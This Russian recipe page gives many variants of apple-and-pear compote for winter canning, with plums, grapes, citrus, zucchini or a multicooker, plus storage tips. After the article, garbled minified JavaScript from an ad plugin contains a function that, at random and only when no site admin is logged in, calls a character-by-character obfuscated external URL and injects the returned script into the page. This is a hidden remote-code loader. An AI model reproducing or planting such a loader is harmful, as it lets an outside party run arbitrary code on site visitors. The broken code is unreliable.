Компот из яблок и груш

Витамины в банке: компот из яблок и груш на зиму

Компот из яблок и груш на зиму, слив, сухофруктов и различных фруктовых миксов – прекрасная альтернатива кофе и чаю не только в зимний, но и в летний период. Компот из яблок и груш на зиму – отличное средство согреться и ощутить кусочек лета. Предлагаем вашему вниманию небольшую подборку рецептов приготовления.

От качества используемых фруктов зависят вкусовые качества напитка и его цвет. Для приготовления рекомендуется использовать спелые, неповрежденные плоды. Наиболее традиционными фруктами для приготовления компотов являются яблоки, груши, сливы и вишни. В зависимости от используемых ингредиентов получаем различные вкусовые и полезные качества напитка при выходе. Помимо всего прочего, компот с минимальным содержание сахара является низкокалорийным продуктом, а люди, соблюдающие диету, вполне могут себе позволить употребление данного напитка.

Компот из груш и яблок, простой рецепт

Чтобы приготовить компот, используйте следующее:

  • воды – 3 литра;
  • фрукты (яблоки и груши) – по 0,5 кг;
  • сахар – 135 грамм.

Рассмотрим, как варить компот из яблок и груш.

  1. Фрукты вымыть.
  2. Убрать сердцевины. Порезать фрукты крупными дольками. Очищать фрукты от кожицы не стоит, чтобы они не разварились и компот не превратился в пюре.
  3. Сложить порезанные фрукты в кастрюльку, залить теплой водой, пусть закипит. После закипания варить около 15 минут на слабом огне.
  4. В это время простерилизовать необходимое количество банок.
  5. Готовые яблоки и груши выложить шумовкой в стерилизованные банки.
  6. В оставшийся отвар добавить сахар, перемешать тщательно до растворения.
  7. Довести до кипения, после сиропом залить яблоки и груши.
  8. Банки закатать крышкой, перевернуть.

Если вы хотите получить максимально прозрачный компот из свежих яблок и груш, чтобы мякоть не разваривалась, фрукты необходимо варить целиком, не разрезая.

С этой целью можно брать фрукты небольшого размера. В этом случае консервированные фрукты в дальнейшем можно применять в приготовлении различных десертов.

Яблоки – источник незаменимых витаминов групп В, А и С, которые помогают поддержать иммунную систему в зимнюю пору и период межсезонья. Кроме того, они содержат дубильные вещества и кислоты, нормализирующие работу пищеварительной системы.

Груши – источник витаминов А, С, РР, таких микроэлементов, как железо, йод, фолиевая кислота, клетчатка, пектины, дубильных веществ. Полезны для людей с нарушенной деятельностью щитовидной железы, при простудных заболеваниях применяются как отхаркивающее средство.

Компот из яблок и груш: рецепт (с добавлением цедры апельсина или лимона)

Чтобы приготовить следующий рецепт напитка из свежих яблок и груш, возьмите 2,3 литра воды, по 450 грамм спелых груш и яблок, 115 грамм сахара, цедру одного цитрусового. Такой ингредиент, как корица, является необязательным и добавляются по вкусу.

Приготовление:

  • вымытые, очищенные от сердцевины и крупно порезанные яблоки и груши засыпать сахаром и залить водой;
  • варить напиток после закипания воды не более 15 минут;
  • специи (корица, цедра) добавить по вкусу.

Чтобы яблоки не потемнели, перед варкой нужно сбрызнуть их водой с лимонной кислотой.

Цедру нарезать в виде спирали при помощи специального ножа.

Для консервации залейте компот в банки (простерилизованные) и закатайте крышкой.

Корица укрепляет состояние сосудов и сердечной мышцы, помогает бороться в период эпидемий с простудными заболеваниями, обладает антибактериальными и противовоспалительными свойствами.

Доказана эффективность запаха корицы в улучшении концентрации внимания и свойств памяти. Компот из яблок и груш получится очень вкусным, а рецептом его приготовления справится любая хозяйка.

Компот из яблок, груш и сливы на зиму (ассорти)

Такой компотный микс получается ароматнее и насыщеннее, нежели компот просто из яблок или груш. Чтобы приготовить напиток, необходимы следующие ингредиенты:

  • фрукты – приблизительно по 1 килограмму яблок, груш и слив;
  • воды возьмите около 3-х литров, для более насыщенного вкуса можно меньше;
  • сахар – чуть меньше стакана.

  1. Фрукты помыть, очистить от сердцевины, разрезать на 5-6 частей. Сливы отделить от косточки.
  2. Сахар растворить в воде, довести до кипения.
  3. В закипевший сироп всыпать фрукты, оставить кипеть около 10 минут.
  4. Снять с плиты. Настоять 10 минут.
  5. Откинуть фрукты на дуршлаг, разложить по банкам, залить получившимся сиропом.
  6. После поставить на стерилизацию. Закатать.

Для сохранения максимального количества полезных витаминов компоты из яблок груш и сливы на зиму следует доводить до слабого кипения и продолжать уваривать на медленном огне не более пяти минут.

Можно заменить медом добавление сахара, что также усилит полезные свойства напитка.

Сливы – кладезь витамина Р и калия, полезных для человеческого организма. Способствуют снижению кровяного давления, уровня холестерина, улучшают работу пищеварительного тракта, облегчают боли при ревматизме и подагре.

Помимо компотов из яблок и груш на зиму и прочих фруктов ценным аналогом, как по вкусу, так и по содержанию полезных микроэлементов, является компот из сухофруктов (узвар). Полезность узвара зависит от составляющих, из которых он приготовлен. Обычно для его приготовления используют сушеные яблоки, груши, чернослив, иногда добавляют изюм.

Есть несколько способов приготовления узвара. Первый способ – это запаривание сухофруктов. При этом предварительно вымоченные сухофрукты заливают кипятком и настаивают под крышкой несколько часов. При втором способе сухофрукты, опять-таки предварительно вымоченные, заливают водой и доводят до кипения.

В полезности компотов нет сомнений. Однако стоит помнить, что компот из яблок и груш на зиму, особенно кислых сортов, с осторожностью следует употреблять людям, страдающим повышенной кислотностью желудка. Диабетикам для снижения калорийности напитка компоты лучше варить без сахара.

Видео о приготовлении классического компота ассорти

Простой рецепт компота из яблок и груш на зиму

После окончания лета ностальгируют по тем ароматным плодам, которые дарил в течение всего сезона сад. Поэтому и посвящают хозяйки свое свободное время заготовкам на зиму. Кроме варенья, упор делают на приготовление консервов из фруктов. Как ароматен компот из груш и яблок, который напомнит о лете, подарит массу приятных минут и наполнит организм полезными элементами.

Особенности приготовления

Вариантов приготовления на зиму компотов несколько. Часть хозяек подходит к заготовкам дотошно, проводя многократную заливку фруктов и стерилизуя банки.

Другие готовят просто, без излишних усилий. К общим правилам готовки относят:

  • тщательную сортировку груш и яблок, с выбором целых, без повреждений, червоточин, гнили;
  • подбор плотных по консистенции фруктов;
  • промывку плодов перед закладкой в тару;
  • подготовку банок с их промывкой в горячей воде с добавлением пищевой соды и стерилизацией над паром либо в духовке;
  • подбор крышек для закатывания компота без царапин и вмятин, с плотно прилегающими резинками.

Правильно приготовленный фруктовый напиток не только утолит жажду, но и подарит кусочек лета. В плодах консервированных груш и яблок сохраняется большое количество витаминов и микроэлементов, которые так нужны организму человека зимой.

Как сварить компот из свежих груш и яблок на зиму

Приготовить яблочно-грушевый продукт легко, если подобрать тот рецепт, который не раз опробован хозяйками. Можно сварить напиток из цельных плодов, но тогда они должны быть небольшими, чтобы смогли войти в банку. Крупные плоды надо будет разрезать.

Подготовка фруктов

Компот лучше готовить из свежих, а не сушеных продуктов. Собранные или купленные плоды груш и яблок промывают с использованием щеточки под проточной водой. Снимать кожуру с них не стоит. Так больше сохранится витаминов под шкуркой.

Перед готовкой необходимо обсушить фрукты, используя одноразовые полотенца.

Если сорт фруктов славится крупными плодами, то их нарезают дольками или разрезают на 4 части. При этом очищают груши и яблоки от сердцевины, аккуратно вырезая ее острым ножом. От веточек и листочков также освобождают плоды.

Количество груш и яблок должно быть одинаковым, тогда и ассорти будет отличаться своеобразным вкусом и ароматом.

Заливка фруктов кипятком

Подготовленные и стерилизованные банки наполняют четвертинками фруктов на половину объема. Сначала заливают крутым кипятком, чтобы все плоды оказались под водой. После этого дают плодам отмочиться, напитаться влагой. Для этого оставляют на 1 час.

В некоторых рецептах считают, что достаточно продержать плоды в кипятке 10 минут, но заливать их стоит 2-3 раза, сливая воду. Сделать все надо так, чтобы соблюсти санитарно-гигиенические правила консервирования.

Доводят компот до полной готовности

Последний раз сливают воду в кастрюлю. Если жидкости мало для заливки, то добавляют немного воды. Засыпают сахар, взяв на килограмм фруктов его такое же количество. Желательно добавить немного лимонной кислоты, которую можно заменить соком свежего апельсина или лимона. Неплохо для запаха, пикантности положить и листики мяты, щепотку корицы.

Теперь остается варить сироп, постоянно помешивая. Кипятят так, чтобы все ингредиенты растворились полностью, без остатка. Горячей жидкостью заливают фрукты, заполнив банки до краев.

После этого закрывают прокипяченными железными крышками и закручивают. Перевернув вверх дном, ждут, когда емкости с компотом остынут.

Для лучшей сохранности можно простерилизовать залитые сиропом банки с фруктами. Емкости выдерживают на водяной бане до 30-40 минут. Только после этой процедуры закрывают тару крышками.

Можно укутать банки, дожидаясь полного остывания. Готовые компоты на зиму из груш и яблок готовы, и их отправляют в прохладное место.

Как подавать яблочно-грушевый компот

Десертный напиток из яблок и груш — отличное дополнение к обеду или полднику. Его подают охлажденным. Если сироп сильно сладкий, можно развести его холодной кипяченой водой и налить в высокие стаканы или фужеры. Фрукты тогда выкладывают отдельно.

Компот из груш и яблок на зиму – лучшая заготовка-ассорти для всей семьи!

Опытные хозяйки остаются верны традициям, предпочитая компот из груш и яблок на зиму всем современным вариантам. Нет смысла искать что-то новое, когда сочетание двух садовых фруктов дает легкий и нежный, кисло-сладкий напиток, который можно дополнить ягодами или цитрусовыми, тем самым, недорого и просто разнообразить заготовку.

Как сварить компот из яблок и груш?

Яблочно-грушевый компот на зиму можно приготовить двумя способами: методом двукратной заливки кипятком без стерилизации или путем проваривания плодов в сладком сиропе, с последующей стерилизацией. В банки обязательно добавляют лимонную кислоту или сок лимона. Эти консерванты сохраняют фруктам цвет и в целом всю заготовку.

  1. Чтобы в процессе нарезания яблоки и груши не потемнели, нужно положить дольки фруктов в холодную подкисленную воду. В этом случае, консервированный компот из яблок и груш получится не только вкусным, но и внешне привлекательным.
  2. Равное соотношение фруктов друг к другу в пропорции к 1:1 сделают компот из садовых яблок и груш максимально вкусным и насыщенным.

Компот-ассорти из яблок, груш на зиму

Хозяйки, которые хотят, чтобы компот из свежих яблок и груш имел натуральный вкус и цвет, а кусочки фруктов не были мучнистыми, закрывают консервацию методом двукратной заливки. Просто, удобно и эффективно. Особенно, если добавить в банку лимонную кислоту. Фрукты не только пройдут щадящую стерилизацию, но сохранят форму и не потемнеют.

  • яблоки – 150 г;
  • груши – 150 г;
  • вода – 800 мл;
  • сахар – 120 г;
  • лимонная кислота – 5 г.
  1. Разрежьте плоды на 4 части и уложите в стерильную тару.
  2. Добавьте лимонную кислоту и залейте кипятком на 15 минут.
  3. Слейте кипяток в кастрюлю, доведите воду до кипения.
  4. Повторите действие еще раз.
  5. Добавьте в слитую воду сахар, проварите.
  6. Залейте кипящим сиропом фрукты.
  7. Быстро закатайте компот ассорти из груш и яблок на зиму крышками.

Компот из яблок, груш и винограда

Компот из свежих яблок, груш и винограда – одна из самых удачных осенних комбинаций. С виноградом, напиток приобретает пикантный, терпкий вкус, эстетический вид и интересный винный цвет (в том случае, если использовать темные сорта винограда). Учитывая склонность винограда вызывать брожение, заготовку обязательно стерилизуют.

  • груши – 200 г;
  • яблоки – 200 г;
  • виноград – 100 г;
  • вода – 2,5 л;
  • сахар – 200 г;
  • лимонная кислота – 1/2 ч ложки.
  1. Оделите виноград от веточек и уложите вместе с дольками яблок и груш в стерильную тару.
  2. Добавьте в кипящую воду сахар и лимонную кислоту и проварите до растворения кристаллов.
  3. Залейте заготовку кипящим сиропом, прикройте крышкой и стерилизуйте компот из груш и яблок на зиму 15 минут.

Компот из яблок и груш без сахара

Заготавливая компот из яблок и груш для ребенка в качестве альтернативы магазинным сокам, лучше придерживаться здорового варианта и не использовать сахар. Это поможет избежать диатеза и не отразится на вкусовых качествах заготовки. Сам процесс до банального прост: фрукты бланшируются, заливаются кипятком и стерилизуются 15 минут.

  • яблоки – 350 г;
  • груши – 350 г;
  • вода – 2, 2 л.
  1. Пробланшируйте дольки яблок и груш в течение 3 минут.
  2. Уложите в банку, залейте кипятком, прикройте крышкой и поставьте в кастрюлю с кипящей водой.
  3. Компот детский из груш и яблок на зиму стерилизуется 15 минут, после чего, быстро закатывается стерильной крышкой.

Компот из груши, яблок и слив

Хозяйки, не успевшие запастись свежей сливой, могут сварить компот из яблок, груш и чернослива. Высушенный естественным путем чернослив превосходит «родственницу» и витаминным составом, и концентрированным вкусом. Раскрывает свои качества только при длительном настаивании, поэтому открывать напиток лучше через 2 месяца.

  • яблоки – 250 г;
  • груши – 250 г;
  • чернослив – 300 г;
  • сахар – 200 г;
  • вода – 2, 5 л.
  1. Замочите чернослив в воде на 15 минут.
  2. Приготовьте сироп. Проварите чернослив в сиропе 10 минут.
  3. Добавьте дольки яблок и груш и через 3 минуты снимите с плиты.
  4. Перелейте в стерильную тару, закатайте и укутайте до полного остывания.

Компот из яблок, груш и кабачков

Компот из яблок и груш – рецепт, меняющий представление о стандартных составляющих напитка. Речь идет о сочетании фруктов с кабачками. Немного нетрадиционно, зато оригинально и вкусно. Нейтральные кабачки, пропитываясь сиропом, становятся похожи на ананасы: приобретают хрустящую текстуру и тот же кисло-сладкий, освежающий вкус.

  • кабачки – 300 г;
  • яблоки – 200 г;
  • груши – 200 г;
  • вода – 2, 2 л;
  • яблочный уксус – 50 мл;
  • сахар – 300 г.
  1. Из воды и сахара сварите сироп.
  2. Проварите в нем фрукты 10 минут.
  3. Добавьте кабачки и томите 20 минут.
  4. Введите уксус, снимите с огня, закатайте компот из груш и яблок на зиму в стерильную тару.

Компот из яблок, груш и апельсинов

Совсем не обязательно, чтобы вкусный компот из груш и яблок включал в свой состав разнообразные ягоды и фрукты. Можно добавить несколько долек апельсина и напиток сразу же приобретет жизнерадостный цвет и освежающий вкус. Главное – не злоупотреблять количеством: эфирные масла, содержащиеся в кожуре, могут испортить заготовку горечью.

  • яблоки и груши – по 2 шт.;
  • дольки апельсина – 3 шт.;
  • сахар – 40 г;
  • вода – 850 мл.
  1. Разрежьте дольки апельсина на 4 части и уложите с яблоками и грушами в литровую банку.
  2. Залейте кипятком на 15 минут.
  3. Воспользуйтесь методом двукратной заливки.
  4. Залейте содержимое банки сиропом.

Компот из яблок, персиков и груш

Персик – единственный фрукт, способный превратить компот из яблок и домашних груш в элегантный десерт. К этому обязывает особая нарезка. Рука не поднимается мельчить бархатистые плоды, поэтому их разрезают на половинки. Так же поступают и садовыми фруктами. Что касается приготовления, то оно традиционно – фрукты проваривают в сиропе.

  • персики – 8 шт.;
  • яблоки и груши – по 4 шт.;
  • вода – 2,2 л;
  • сахар – 375 г;
  • лимонный сок – 60 мл.
  1. Разрежьте фрукты на несколько частей, пересыпьте сахаром и отставьте на 20 минут.
  2. Добавьте воду и проварите 3 минуты.
  3. Приправьте лимонным соком и закатайте в стерильную тару.

Компот из яблок и груш в мультиварке

Многие хозяйки настолько привыкли к услугам мультиварки, что даже яблочно-грушевый компот предпочитают варить только в ней. Причем агрегат предоставляет два варианта приготовления напитка: загрузить все в чашу и томить в режиме «Тушение» в течение часа или проварить кусочки фруктов в сладком сиропе в «Мультиповаре» за пару минут.

  • груши и яблоки – по 500 г;
  • сахар – 500 г;
  • лимонная кислота – 5 г;
  • вода – 1,5 л;
  • бутоны гвоздики – 3 шт.
  1. Установите режим «Мультиповар» на 160 градусов, влейте воду добавьте сахар и гвоздику, варите 5 минут.
  2. Добавьте кусочки яблок, через минуту груши и потомите 2 минуты.
  3. Всыпьте лимонную кислоту. Перелейте компот в стерильную тару.

Сколько варить компот из яблок и груш?

Как варить компот из яблок и груш

Пропорции компота из яблок и груш
Вода – 1 литр
Сахар – 1 стакан
Яблоки – 3 штуки
Груши – 3 штуки

Подготовка продуктов
Яблоки и груши промыть, обсушить, удалить семенные коробочки и плодоножки, нарезать дольками.

Как варить яблочно-грушевый компот в кастрюле
1. Налить в кастрюлю воду, поставить на огонь, всыпать в горячую воду сахар и размешать его.
2. Варить сироп 10 минут после закипания на тихом огне.
3. Выложить в кастрюлю яблоки и груши и варить 5 минут.

Как варить яблочно-грушевый компот в мультиварке
1. В кастрюлю мультиварки налить воду, выложить сахар.
2. Настроить мультиварку на режим “Выпечка”, варить сироп после закипания 10 минут.
3. Выложить яблоки и груши, продолжить варку на том же режиме ещё 10 минут.

Заготовка компота из яблок и груш на зиму
1. Яблоки и груши с помощью шумовки разложить по стерилизованным банкам.
2. Сироп ещё раз довести до кипения и разлить сверху осторожно, тонкой струйкой.
3. Герметично закрыть банки с компотом, остудить и убрать на хранение.

Компот из яблок и груш при правильной заготовке будет храниться до 1 года.

Фкуснофакты

Вкус компота из яблок и груш напрямую зависит от сорта фруктов: если яблоки слишком кислые, следует разбавить кислоту сладкими сортами груши. А если груши и яблоки оказались кислыми, следует добавить больше сахара.

Компот из яблок и груш, как правило, имеет бледно-жёлтый цвет, иногда слегка мутный. Чтобы сделать компот ярче, добавьте несколько слив, малину, черноплодку или смородину.

Чтобы получить прозрачный компот, необходимо варить яблоки и груши целиком – тогда мякоть не разварится.

Как сварить быстрый компот из яблок и груш

Продукты
Яблоки – 2 штуки
Груши – 2 штуки
Вода – 2 стакана

Как варить компот из яблок и груш
1. Яблоки и груши промыть и разрезать пополам, вырезать плодоножки и семенные коробочки.
2. Выложить яблоки и груши в кастрюлю, влить 2 стакана воды.
3. Довести компот до кипения на большом огне, затем уменьшить огонь и варить компот 5 минут.
4. Накрыть компот крышкой и дать настояться 10 минут.
Перед употреблением размешать компот.

Вопросы повару

Рецепты и ответы чтением не дольше минуты


Общие правила варки компота
Если забродил компот
Если в компоте плесень.
Что делать, если компот слишком сладкий?
Как быстро остудить компот?
Почему горчит компот из сухофруктов?
Почему на компоте из сухофруктов налет/плёнка?
Почему компот белый?
Почему компот солёный? Автор/редактор – Лидия Иванова

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};